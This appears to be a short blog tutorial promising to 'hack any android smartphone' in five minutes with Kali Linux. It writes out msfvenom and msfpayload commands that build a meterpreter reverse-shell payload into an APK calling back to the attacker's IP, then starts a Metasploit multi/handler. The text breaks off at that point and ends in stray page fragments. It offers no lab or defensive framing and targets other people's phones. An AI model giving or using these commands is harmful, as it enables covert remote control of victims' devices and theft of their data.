In this tutorial, I am going to show you how to hack any android smartphone just under 5 mins using Kali Linux
This tutorial is a basic one, I will be making another tutorial on this in which I will be going into some advanced topics.
Requirements:
- Kali Linux 2016 (This works on any other version too): You can download it from here – https://www.kali.org/downloads
Steps to be followed :
- Boot up you Kali Linux
- Open up a new terminal
- Type in the following
msfvenom -p android/meterpreter/reverse_tcp LHOST=”Your Ip Adress” LPORT=443 R>HackDemo.apk
if that doesn’t work, it’s probably because you’re using an older version of Kali Linux. In that case, use the following command :
Note: You can find your IP Adress by executing the command “IFCONFIG” inside another terminalmsfpayload android/meterpreter/reverse_tcp LHOST=”Your Ip Adress” LPORT=443 R>HackDemo.apk
- Start the Msfconsole by executing the command “MSFCONSOLE”
- Then Type in the following Commands
use multi/handler
ConversionConversion EmoticonEmoticon